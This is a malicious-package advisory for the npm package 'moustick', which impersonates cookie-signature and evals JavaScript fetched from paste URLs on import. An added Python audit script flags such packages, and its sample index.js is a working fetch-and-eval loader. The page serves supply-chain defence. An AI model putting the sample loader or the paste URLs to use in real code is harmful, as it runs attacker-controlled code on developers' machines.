moustick @1.2.2

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5347

Ecosystem

npm

Summary

Package impersonates the popular cookie-signature library: it copies the description, README, author (TJ Holowaychuk), and repository URL of visionmedia/node-cookie-signature in package.json, while the package itself is published under the unrelated name `moustick`. On `require('moustick')`, index.js performs an HTTPS GET to https://www.jsonkeeper.com/b/MYUKZ (an anonymous, mutable paste host) and passes the response field `content_o` directly to `eval()`, executing whatever JavaScript the paste currently serves in the consumer's Node process. A helper function `g(h)` hex-decodes identifiers and assembles a second paste URL https://www.jsonkeeper.com/b/HY6M6 (`hl` decodes to `['axios','get','https://www.jsonkeeper.com/b/HY6M6','then']`), providing a second remote-fetch primitive and confirming intentional evasion. Any developer who installs this package expecting cookie-signing functionality executes attacker-controlled code at import time; the operator can swap the paste contents at any time to deliver new payloads.

Source: amazon-inspector (deae034e46d94eafe1db97a6a57a664400f03caa48af8f775f6064c361c6bb9a)
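The three indicators the summary describes (package name unrelated to the copied repository URL, `eval()` fed from a network fetch, and hex-encoded identifiers) can be checked statically before a package is ever required. The following audit script is an added example, not part of the OSV record or the Amazon Inspector source; the package.json and index.js contents it scans are constructed stand-ins that mimic the described pattern, not the real package files.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample files mimicking the reported pattern (hypothetical
# contents for illustration, not the actual moustick package).
PACKAGE_JSON = json.dumps({
    "name": "moustick",
    "version": "1.2.2",
    "repository": {"type": "git",
                   "url": "git+https://github.com/visionmedia/node-cookie-signature.git"},
    "main": "index.js",
})
INDEX_JS = """
const https = require('https');
const hl = ['6178696f73', '676574'];   // hex-encoded identifiers
https.get('https://www.jsonkeeper.com/b/EXAMPLE', r => {
  let b = ''; r.on('data', d => b += d);
  r.on('end', () => eval(JSON.parse(b).content_o));
});
"""

NET_CALL = re.compile(r"\b(https?\.get|https?\.request|fetch|axios)\s*[(.]")
HEX_LIT = re.compile(r"['\"]([0-9a-fA-F]{8,})['\"]")

def repo_name_mismatch(pkg: dict) -> bool:
    """True when the package name shares nothing with the repository's name."""
    repo = pkg.get("repository")
    url = repo.get("url", "") if isinstance(repo, dict) else (repo or "")
    base = urlparse(url.replace("git+", "", 1)).path.rstrip("/").rsplit("/", 1)[-1]
    base = re.sub(r"^node-", "", re.sub(r"\.git$", "", base))
    name = pkg.get("name", "").rsplit("/", 1)[-1]   # drop any @scope/ prefix
    return bool(base and name) and name != base and name not in base and base not in name

def decoded_hex_strings(js: str) -> list:
    """Hex string literals (even length, >= 4 bytes) that decode to printable ASCII."""
    out = []
    for lit in HEX_LIT.findall(js):
        if len(lit) % 2 == 0:
            raw = bytes.fromhex(lit)
            if all(32 <= c < 127 for c in raw):
                out.append(raw.decode("ascii"))
    return out

def audit(package_json: str, index_js: str) -> list:
    """Return the impersonation / remote-eval indicators found in a package."""
    pkg = json.loads(package_json)
    findings = []
    if repo_name_mismatch(pkg):
        findings.append("repository-name-mismatch")
    if "eval(" in index_js and NET_CALL.search(index_js):
        findings.append("eval-with-network-fetch")
    if decoded_hex_strings(index_js):
        findings.append("hex-encoded-identifiers")
    return findings
```

Run `audit()` over each package pulled from a lock file before install; any hit on the second indicator alone is worth blocking, since legitimate cookie-signing code has no reason to evaluate fetched text.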
